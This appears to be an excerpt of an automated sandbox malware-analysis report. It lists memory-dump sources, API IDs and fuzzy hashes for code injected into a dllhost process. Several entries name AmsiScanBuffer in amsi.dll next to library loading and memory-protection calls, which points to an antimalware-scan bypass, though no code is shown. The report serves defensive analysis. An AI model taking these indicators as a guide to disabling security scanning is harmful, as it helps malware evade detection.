                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProcSleep
                              • String ID: AmsiScanBuffer$amsi.dll
                              • API String ID: 188063004-3248079830
                              • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction ID: 9617fb6b13abb7afbda2873504d7972334cd5f783831b631bd50b566f9054518
                              • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction Fuzzy Hash: 06D06764711F25D5EA28FB95EC6C3642271AB74B03FC4041BC50AC23A4DE3D855BC748
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProcSleep
                              • String ID: AmsiScanBuffer$amsi.dll
                              • API String ID: 188063004-3248079830
                              • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction ID: 32fcce1ea9fc06f50fc70cf5d71f3e4bf1e20a635fc44ac8a26e217e5cd0fc46
                              • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction Fuzzy Hash: E9D06714711E20D5EA2CAB91EE5CB54A261BF74B43FD54417F60A822A4DE3C8999D348
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                              • Instruction ID: 01e48bac29b84cacdcabfd52d5518a6f703ce639e26d87711d05678aaf7025ab
                              • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                              • Instruction Fuzzy Hash: 2B020B32618B90C6EB60CB95F89435ABBA0F3D4796F104116FA8E87BA8DF7DC455CB04
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                              • Instruction ID: 8e0c6c64a3287805e1ac12cd4430a9c5e1d706b2d811ac189109d8fcfda46d84
                              • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                              • Instruction Fuzzy Hash: 9C02E736219F90C6E760CB95E99435AB7A0F794796F104016FA8E87BA8DF7CC494CB04
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                              • Instruction ID: e9027cc1b83568338ea3ab293c0b81032d38396c6a35d2d54c6d6288ebc04295
                              • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                              • Instruction Fuzzy Hash: BC51C135204F218BEB35DB96AC58A6A73A0F7A4B43F50401BDD4AC3754DB39C84ACB08
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                              • Instruction ID: d2fbd03fdabe24f1c4044325d0b96d78f35f9b099f7b3a77332dd579f1ab7cc9
                              • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                              • Instruction Fuzzy Hash: 0351A336604E2187E374CB96ED48B5AF3A4FBA4B47F50411AEE4A83754DF39C985CB08
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                              • Instruction ID: af05b21a754011702833c51a0a3e7f06063cb41db7065614cf312f931de0f867
                              • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                              • Instruction Fuzzy Hash: 42517E35214B6186EB34DFA6EC5862A73A0F7A9B87F40411BDD4AC3754DB39C856CB08
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                              • Instruction ID: bcc4a473dc99b90a887c7ea6b688f1d3a19d2d941c951f5f75a36d30552b8684
                              • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                              • Instruction Fuzzy Hash: 4B516C35214E6187E734CF96ED4875AF3A0FBA9B87F40411AEE4A83B54DB38D845CB08
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                              • Instruction ID: 5ef3b3ba7456089300c740342d55ea255fd31009605e068016aa2c9fe6e06836
                              • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                              • Instruction Fuzzy Hash: 8F61DB36628B50C6EB70CF95E85831AB7A0F398746F104116FA8D87BA8DB7DC942CF44
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                              • Instruction ID: 4f087fab8823cbc5673d3d05a97717fde2fda92d248116e2da8c5fa324f0bd7c
                              • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                              • Instruction Fuzzy Hash: D861C936529F64C6E770CB95E95831AB7A0F798786F101116FA8D87BA8DB7CC580CB08
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: CurrentProcessProtectVirtual$HandleModule
                              • String ID:
                              • API String ID: 1092925422-0
                              • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction ID: 120a3a61e9b521481b371b0edb1c759a5f904d2a31235dcc5b91780988122d61
                              • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction Fuzzy Hash: FE118226604F51C7EF34DB61E80821A67B0FB55B92F044427DE8D87794EB7EC986C788
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: CurrentProcessProtectVirtual$HandleModule
                              • String ID:
                              • API String ID: 1092925422-0
                              • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction ID: 38e69ab22308daa1ae7456ff484f751e4064f44655339dd8387b4b7520d3e91b
                              • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction Fuzzy Hash: 7D112E26615B5093EB34CBA1E90861AA7B0FB54B82F044027FA9D83794EF7DD994C788
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                              • String ID: csm
                              • API String ID: 2395640692-1018135373
                              • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction ID: 4c3c8c000ff8d9b58207d3768de86427df932d809bc1c7205dbc172b037208e3
                              • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction Fuzzy Hash: 1151E732311F208ADF68CF95D85C76D7791F364B8BF144112DA4A87788DB7AD852C708
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                              • String ID: csm
                              • API String ID: 2395640692-1018135373
                              • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction ID: c066c7c92eb1eae260a0ef3743626357e193efd9a293d1e0535eaf988c4d3d70
                              • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction Fuzzy Hash: 2D51F636311E208ADB74CF55EA8CB6CB791FB64B9BF144112FA4987788D779C891C704
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: CallEncodePointerTranslator
                              • String ID: MOC$RCC
                              • API String ID: 3544855599-2084237596
                              • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction ID: 663bb47588d7a528b950805dbf72785c1f6c0a41adbeacdf110e487fcd1ff7c7
                              • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction Fuzzy Hash: FB61B036504FC482DB31CF55E8543AAB7A0F7A4BDAF044216EB9993B95DB39C192CB04
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                              • String ID: csm$csm
                              • API String ID: 3896166516-3733052814
                              • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction ID: 1727ab960dd3bd650574e698e9da8f025e129805f158415f29d4b79c20d9219a
                              • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction Fuzzy Hash: B851AF32204B508BEF74CBA2D96837877A0F364BC7F144117DA9987B95DB3AC852C709
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000003.2596028752.0000025DC1A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025DC1A90000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_3_25dc1a90000_dllhost.jbxd
                              Similarity
                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                              • String ID: csm$csm
                              • API String ID: 3896166516-3733052814
                              • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction ID: e41938160841b73fcf891f8bbaf2161ffd2cde9ab85c6373f6d365d64e4c72d7
                              • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction Fuzzy Hash: 60518E32204BA08AEB74DF959948358B7A0F374BA7F144117DA89C7B95CB39C4E3CB09
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: CallEncodePointerTranslator
                              • String ID: MOC$RCC
                              • API String ID: 3544855599-2084237596
                              • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction ID: 18963d30f4c57578046966c78873675c98cb68d8b4bef455f81fc9d06f7132fd
                              • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction Fuzzy Hash: E1618D32504FC489EB308B55E94479AB7A0FBA5B96F044216FB9893B95DB78C1D0CB04
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                              • String ID: csm$csm
                              • API String ID: 3896166516-3733052814
                              • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction ID: becd46b8087623add916d14ccb839c44f2ca788b37935a93f0f6c92bbe63381b
                              • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction Fuzzy Hash: F9519432200BA08FEB748F919A48358B791FB66B97F144517EA49C7BD5C739D4E0C709
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                              • String ID: pid_
                              • API String ID: 517849248-4147670505
                              • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                              • Instruction ID: ee39a34659d846c54c6c9c8b950fb6f8c359cf2c96705b14c347dbcd33d13a1f
                              • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                              • Instruction Fuzzy Hash: 95117521314FA191EF30DBA9EC2835A52A4BB64783F8040269A49C3794EF7AC917C748
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                              • String ID: pid_
                              • API String ID: 517849248-4147670505
                              • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                              • Instruction ID: cef4abd84cc548dbd147c1cf87cef8990c5f82be2d2cfb2da980abf0694b6d04
                              • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
